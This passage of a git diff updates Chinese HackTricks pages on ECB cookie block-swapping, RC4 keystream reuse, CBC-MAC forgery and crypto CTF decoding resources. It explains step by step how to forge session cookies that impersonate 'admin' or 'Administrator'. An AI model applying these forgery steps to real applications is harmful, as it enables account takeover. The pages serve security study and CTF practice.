+{% endhint %} # ECB -(ECB) 电子密码本 - 对称加密方案,**将明文的每个块**替换为**密文块**。这是**最简单**的加密方案。其主要思想是将明文分割成**N位的块**(取决于输入数据块的大小、加密算法),然后使用唯一密钥加密(解密)每个明文块。 +(ECB) 电子密码本 - 对称加密方案,**将明文的每个块**替换为**密文块**。这是**最简单**的加密方案。其主要思想是将明文分成**N位的块**(取决于输入数据块的大小、加密算法),然后使用唯一密钥加密(解密)每个明文块。 ![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png) @@ -27,26 +28,26 @@ # 漏洞的检测 想象一下,您多次登录一个应用程序,**总是得到相同的cookie**。这是因为应用程序的cookie是**`<用户名>|<密码>`**。\ -然后,您创建两个新用户,两者都具有**相同的长密码**和**几乎相同的用户名**。\ -您发现**两个用户信息的8字节块**是**相同的**。然后,您想象这可能是因为正在使用**ECB**。 +然后,您生成两个新用户,两者都有**相同的长密码**和**几乎相同的用户名**。\ +您发现**两个用户信息**相同的**8字节块**是**相同的**。然后,您想象这可能是因为正在使用**ECB**。 -就像以下示例中一样。观察这**两个解码的cookie**中多次出现的块**`\x23U\xE45K\xCB\x21\xC8`**。 +就像在以下示例中一样。观察这**两个解码的cookie**中多次出现的块**`\x23U\xE45K\xCB\x21\xC8`**。 ``` \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 ``` -这是因为这些 cookie 的**用户名和密码中包含多次字母"a"**(例如)。**不同的区块**是包含**至少 1 个不同字符**的区块(也许是分隔符"|"或用户名中的某些必要差异)。 +这是因为这些 cookie 的**用户名和密码中包含多次字母"a"**(例如)。**不同的区块**是指包含**至少 1 个不同字符**的区块(也许是分隔符"|"或用户名中的某些必要差异)。 -现在,攻击者只需发现格式是`<用户名><分隔符><密码>`还是`<密码><分隔符><用户名>`。为了做到这一点,他只需**生成几个相似且较长的用户名和密码**,直到找到格式和分隔符的长度: +现在,攻击者只需发现格式是`<用户名><分隔符><密码>`还是`<密码><分隔符><用户名>`。为了做到这一点,他可以**生成多个相似且较长的用户名和密码**,直到找到格式和分隔符的长度: | 用户名长度: | 密码长度: | 用户名+密码长度: | 解码后的 Cookie 长度: | -| ------------ | ---------- | ---------------- | ----------------------- | -| 2 | 2 | 4 | 8 | -| 3 | 3 | 6 | 8 | -| 3 | 4 | 7 | 8 | -| 4 | 4 | 8 | 16 | -| 7 | 7 | 14 | 16 | +| ------------ | ---------- | ---------------- | ------------------------ | +| 2 | 2 | 4 | 8 | +| 3 | 3 | 6 | 8 | +| 3 | 4 | 7 | 8 | +| 4 | 4 | 8 | 16 | +| 7 | 7 | 14 | 16 | # 漏洞的利用 @@ -57,7 +58,7 @@ \x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` 我们可以看到先前使用只包含`a`的用户名创建的模式`\x23U\xE45K\xCB\x21\xC8`。\ -然后,您可以移除前8B块,就可以得到用户名为`admin`的有效cookie: +然后,您可以移除第一个8B块,您将得到一个有效的用于用户名`admin`的cookie: ``` \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` @@ -67,13 +68,13 @@ 因此,另一种冒充用户`admin`的方法是: -- 生成一个用户名:`len() + len(`将生成2个8B块。 -- 然后,生成一个密码,填充包含我们想要冒充的用户名和空格的确切块数,例如:`admin `。 +- 生成一个用户名:`len() + len(`将生成2个8B块。 +- 然后,生成一个密码,填充包含我们想要冒充的用户名和空格的确切块数,如:`admin `。 该用户的cookie将由3个块组成:前两个是用户名+分隔符的块,第三个是密码的块(伪装成用户名):`username |admin `。 **然后,只需用最后一个块替换第一个块,就可以冒充用户`admin`:`admin |username`** -# 参考 +## 参考 -* [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\)) +- [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\)) diff --git a/crypto-and-stego/rc4-encrypt-and-decrypt.md b/crypto-and-stego/rc4-encrypt-and-decrypt.md index 7199a054e..2af5e451d 100644 --- a/crypto-and-stego/rc4-encrypt-and-decrypt.md +++ b/crypto-and-stego/rc4-encrypt-and-decrypt.md @@ -1,22 +1,42 @@ +{% hint style="success" %} +学习并练习AWS黑客:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP黑客:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} -如果您可以使用RC4加密明文,只需使用加密函数即可解密由该RC4加密的任何内容(使用相同的密码)。 +如果你能以某种方式使用RC4加密明文,那么只需使用加密函数就可以解密由该RC4加密的任何内容(使用相同的密码)。 -如果您可以加密已知明文,还可以提取密码。更多参考资料可以在HTB Kryptos机器中找到: +如果你能加密一个已知的明文,你也可以提取密码。更多参考资料可以在HTB Kryptos机器中找到: {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} + + + + + +{% hint style="success" %} +学习并练习AWS黑客:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP黑客:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +支持 HackTricks + +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。 + +
+{% endhint %} diff --git a/cryptography/cipher-block-chaining-cbc-mac-priv.md b/cryptography/cipher-block-chaining-cbc-mac-priv.md index f62ccf8f5..9c651fca5 100644 --- a/cryptography/cipher-block-chaining-cbc-mac-priv.md +++ b/cryptography/cipher-block-chaining-cbc-mac-priv.md @@ -1,39 +1,40 @@ +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} # CBC -如果**cookie**只是**用户名**(或cookie的第一部分是用户名),而您想要冒充用户名"**admin**"。那么,您可以创建用户名**"bdmin"**并**暴力破解**cookie的**第一个字节**。 +如果**cookie**只是**用户名**(或 cookie 的第一部分是用户名),而您想要冒充用户名"**admin**"。那么,您可以创建用户名**"bdmin"**并**暴力破解** cookie 的**第一个字节**。 # CBC-MAC -在密码学中,**密码块链接消息认证码**(**CBC-MAC**)是一种从块密码构造消息认证码的技术。消息使用某种块密码算法在CBC模式下加密,以创建一个**块链,使得每个块依赖于前一个块的正确加密**。这种相互依赖确保对**任何**明文**位**的更改将导致**最终加密块**以一种不能预测或抵消的方式发生**更改**,而不知道块密码的密钥。 +**密码块链接消息认证码**(**CBC-MAC**)是密码学中使用的一种方法。它通过逐块加密消息来工作,其中每个块的加密与前一个块相关联。这个过程创建了一个**块链**,确保即使更改原始消息的一个位,也会导致加密数据的最后一个块发生不可预测的变化。要进行或逆转这样的更改,需要加密密钥,确保安全性。 -要计算消息m的CBC-MAC,需要使用零初始化向量在CBC模式下加密m并保留最后一个块。以下图示了使用秘密密钥k和块密码E计算消息包含块的CBC-MAC![m\_{1}\\|m\_{2}\\|\cdots \\|m\_{x}](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5)的计算过程: +要计算消息 m 的 CBC-MAC,需要使用零初始化向量在 CBC 模式下加密 m 并保留最后一个块。以下图示了使用秘密密钥 k 和块密码 E 计算消息组成的块的 CBC-MAC 的计算过程![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5): -![CBC-MAC structure (en).svg](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) +![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) # 漏洞 -使用CBC-MAC时,通常使用的**IV为0**。\ -这是一个问题,因为独立的2个已知消息(`m1`和`m2`)将生成2个签名(`s1`和`s2`)。因此: +使用 CBC-MAC 时通常使用的**初始化向量为 0**。\ +这是一个问题,因为独立的 2 个已知消息(`m1` 和 `m2`)将生成 2 个签名(`s1` 和 `s2`)。因此: * `E(m1 XOR 0) = s1` * `E(m2 XOR 0) = s2` -然后,由m1和m2连接而成的消息(m3)将生成2个签名(s31和s32): +然后,由 m1 和 m2 连接而成的消息(m3)将生成 2 个签名(s31 和 s32): * `E(m1 XOR 0) = s31 = s1` * `E(m2 XOR s1) = s32` @@ -46,36 +47,37 @@ * `rator\00\00\00` 您可以创建一个名为**Administ**(m1)的用户名并检索签名(s1)。\ -然后,您可以创建一个名为`rator\00\00\00 XOR s1`结果的用户名。这将生成`E(m2 XOR s1 XOR 0)`,即s32。\ -现在,您可以使用s32作为完整名称**Administrator**的签名。 +然后,您可以创建一个用户名,称为`rator\00\00\00 XOR s1`的结果。这将生成`E(m2 XOR s1 XOR 0)`,即 s32。\ +现在,您可以使用 s32 作为完整名称**Administrator**的签名。 ### 总结 -1. 获取用户名**Administ**(m1)的签名,即s1 -2. 获取用户名**rator\x00\x00\x00 XOR s1 XOR 0**的签名为s32**。** -3. 将cookie设置为s32,它将成为用户**Administrator**的有效cookie。 +1. 获取用户名**Administ**(m1)的签名,即 s1 +2. 获取用户名**rator\x00\x00\x00 XOR s1 XOR 0**的签名为 s32**。** +3. 将 cookie 设置为 s32,它将成为用户**Administrator**的有效 cookie。 -# 攻击控制IV +# 攻击控制 IV -如果您可以控制使用的IV,则攻击可能会变得非常容易。\ -如果cookie只是加密的用户名,要冒充用户"**administrator**",您可以创建用户"**Administrator**"并获取其cookie。\ -现在,如果您可以控制IV,您可以更改IV的第一个字节,使得**IV\[0] XOR "A" == IV'\[0] XOR "a"**,并重新生成用户**Administrator**的cookie。这个cookie将有效地**冒充**初始**IV**下的用户**administrator**。 +如果您可以控制使用的 IV,攻击可能会变得非常容易。\ +如果 cookie 只是加密的用户名,要冒充用户"**administrator**",您可以创建用户"**Administrator**"并获取其 cookie。\ +现在,如果您可以控制 IV,您可以更改 IV 的第一个字节,使得**IV\[0] XOR "A" == IV'\[0] XOR "a"**,并重新生成用户**Administrator**的 cookie。这个 cookie 将有效地**冒充**初始**IV**下的用户**administrator**。 -# 参考 +## 参考 更多信息请参阅[https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/cryptography/crypto-ctfs-tricks.md b/cryptography/crypto-ctfs-tricks.md index c33b1960f..8721710c7 100644 --- a/cryptography/crypto-ctfs-tricks.md +++ b/cryptography/crypto-ctfs-tricks.md @@ -1,130 +1,131 @@ # Crypto CTFs 技巧 +{% hint style="success" %} +学习并练习 AWS 黑客技巧:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP 黑客技巧:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家) +支持 HackTricks -支持 HackTricks 的其他方式: - -- 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -- 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com) -- 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -- **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 上关注我们 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -- 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**。** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} ## 在线哈希数据库 -- _**谷歌搜索**_ -- [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240) -- [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) -- [https://crackstation.net/](https://crackstation.net) -- [https://md5decrypt.net/](https://md5decrypt.net) -- [https://www.onlinehashcrack.com](https://www.onlinehashcrack.com) -- [https://gpuhash.me/](https://gpuhash.me) -- [https://hashes.org/search.php](https://hashes.org/search.php) -- [https://www.cmd5.org/](https://www.cmd5.org) -- [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5) -- [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) +* _**谷歌搜索**_ +* [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240) +* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) +* [https://crackstation.net/](https://crackstation.net) +* [https://md5decrypt.net/](https://md5decrypt.net) +* [https://www.onlinehashcrack.com](https://www.onlinehashcrack.com) +* [https://gpuhash.me/](https://gpuhash.me) +* [https://hashes.org/search.php](https://hashes.org/search.php) +* [https://www.cmd5.org/](https://www.cmd5.org) +* [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5) +* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) ## 魔术自动解密器 -- [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey) -- [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)(魔术模块) -- [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) -- [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking) +* [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey) +* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (魔术模块) +* [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) +* [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking) ## 编码器 -大多数编码数据可以使用以下两个资源解码: +大多数编码数据可以使用以下两个资源进行解码: -- [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list) -- [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) +* [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list) +* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) ### 替换自动解密器 -- [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram) -- [https://quipqiup.com/](https://quipqiup.com) - 非常好! +* [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram) +* [https://quipqiup.com/](https://quipqiup.com) - 非常好! #### 凯撒密码 - ROTx 自动解密器 -- [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript) +* [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript) #### 阿特巴什密码 -- [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php) +* [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php) ### 基础编码自动解密器 -使用以下链接检查所有这些基础:[https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) +使用以下链接检查所有这些基础编码:[https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) -- **Ascii85** -- `BQ%]q@psCd@rH0l` -- **Base26** \[_A-Z_] -- `BQEKGAHRJKHQMVZGKUXNT` -- **Base32** \[_A-Z2-7=_] -- `NBXWYYLDMFZGCY3PNRQQ====` -- **Zbase32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_] -- `pbzsaamdcf3gna5xptoo====` -- **Base32 Geohash** \[_0-9b-hjkmnp-z_] -- `e1rqssc3d5t62svgejhh====` -- **Base32 Crockford** \[_0-9A-HJKMNP-TV-Z_] -- `D1QPRRB3C5S62RVFDHGG====` -- **Base32 Extended Hexadecimal** \[_0-9A-V_] -- `D1NMOOB3C5P62ORFDHGG====` -- **Base45** \[_0-9A-Z $%\*+-./:_] -- `59DPVDGPCVKEUPCPVD` -- **Base58 (bitcoin)** \[_1-9A-HJ-NP-Za-km-z_] -- `2yJiRg5BF9gmsU6AC` -- **Base58 (flickr)** \[_1-9a-km-zA-HJ-NP-Z_] -- `2YiHqF5bf9FLSt6ac` -- **Base58 (ripple)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_] -- `pyJ5RgnBE9gm17awU` -- **Base62** \[_0-9A-Za-z_] -- `g2AextRZpBKRBzQ9` -- **Base64** \[_A-Za-z0-9+/=_] -- `aG9sYWNhcmFjb2xh` -- **Base67** \[_A-Za-z0-9-_.!\~\_] -- `NI9JKX0cSUdqhr!p` -- **Base85 (Ascii85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] -- `BQ%]q@psCd@rH0l` -- **Base85 (Adobe)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] -- `<~BQ%]q@psCd@rH0l~>` -- **Base85 (IPv6 or RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_] -- `Xm4y`V\_|Y(V{dF>\` -- **Base85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] -- `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d` -- **Base85 (XML)** \[_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\__] -- `Xm4y|V{~Y+V}dF?` -- **Base91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_] -- `frDg[*jNN!7&BQM` -- **Base100** \[] -- `👟👦👣👘👚👘👩👘👚👦👣👘` -- **Base122** \[] -- `4F ˂r0Xmvc` -- **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_] -- `MIc3KiXa+Ihz+lrXMIc3KbCC` -- **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_] -- `DmPsv8J7qrlKEoY7` -- **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_] -- `kLD8iwKsigSalLJ5` -- **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_] -- `ayRiIo1gpO+uUc7g` -- **ESAB46** \[] -- `3sHcL2NR8WrT7mhR` -- **MEGAN45** \[] -- `kLD8igSXm2KZlwrX` -- **TIGO3FX** \[] -- `7AP9mIzdmltYmIP9mWXX` -- **TRIPO5** \[] -- `UE9vSbnBW6psVzxB` -- **FERON74** \[] -- `PbGkNudxCzaKBm0x` -- **GILA7** \[] -- `D+nkv8C1qIKMErY1` -- **Citrix CTX1** \[] -- `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK` +* **Ascii85** +* `BQ%]q@psCd@rH0l` +* **Base26** \[_A-Z_] +* `BQEKGAHRJKHQMVZGKUXNT` +* **Base32** \[_A-Z2-7=_] +* `NBXWYYLDMFZGCY3PNRQQ====` +* **Zbase32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_] +* `pbzsaamdcf3gna5xptoo====` +* **Base32 Geohash** \[_0-9b-hjkmnp-z_] +* `e1rqssc3d5t62svgejhh====` +* **Base32 Crockford** \[_0-9A-HJKMNP-TV-Z_] +* `D1QPRRB3C5S62RVFDHGG====` +* **Base32 Extended Hexadecimal** \[_0-9A-V_] +* `D1NMOOB3C5P62ORFDHGG====` +* **Base45** \[_0-9A-Z $%\*+-./:_] +* `59DPVDGPCVKEUPCPVD` +* **Base58 (bitcoin)** \[_1-9A-HJ-NP-Za-km-z_] +* `2yJiRg5BF9gmsU6AC` +* **Base58 (flickr)** \[_1-9a-km-zA-HJ-NP-Z_] +* `2YiHqF5bf9FLSt6ac` +* **Base58 (ripple)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_] +* `pyJ5RgnBE9gm17awU` +* **Base62** \[_0-9A-Za-z_] +* `g2AextRZpBKRBzQ9` +* **Base64** \[_A-Za-z0-9+/=_] +* `aG9sYWNhcmFjb2xh` +* **Base67** \[_A-Za-z0-9-_.!\~\_] +* `NI9JKX0cSUdqhr!p` +* **Base85 (Ascii85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] +* `BQ%]q@psCd@rH0l` +* **Base85 (Adobe)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] +* `<~BQ%]q@psCd@rH0l~>` +* **Base85 (IPv6 or RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_] +* `Xm4y`V\_|Y(V{dF>\` +* **Base85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] +* `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d` +* **Base85 (XML)** \[_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\__] +* `Xm4y|V{~Y+V}dF?` +* **Base91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_] +* `frDg[*jNN!7&BQM` +* **Base100** \[] +* `👟👦👣👘👚👘👩👘👚👦👣👘` +* **Base122** \[] +* `4F ˂r0Xmvc` +* **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_] +* `MIc3KiXa+Ihz+lrXMIc3KbCC` +* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_] +* `DmPsv8J7qrlKEoY7` +* **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_] +* `kLD8iwKsigSalLJ5` +* **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_] +* `ayRiIo1gpO+uUc7g` +* **ESAB46** \[] +* `3sHcL2NR8WrT7mhR` +* **MEGAN45** \[] +* `kLD8igSXm2KZlwrX` +* **TIGO3FX** \[] +* `7AP9mIzdmltYmIP9mWXX` +* **TRIPO5** \[] +* `UE9vSbnBW6psVzxB` +* **FERON74** \[] +* `PbGkNudxCzaKBm0x` +* **GILA7** \[] +* `D+nkv8C1qIKMErY1` +* **Citrix CTX1** \[] +* `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK` [http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) @@ -142,11 +143,9 @@ ``` .... --- 